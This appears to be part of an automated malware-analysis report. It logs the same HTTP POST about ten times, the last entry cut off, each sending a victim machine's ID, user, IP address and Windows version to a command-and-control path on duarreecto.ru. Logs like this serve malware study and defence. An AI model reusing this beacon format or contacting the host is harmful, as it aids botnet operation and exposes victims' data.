      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user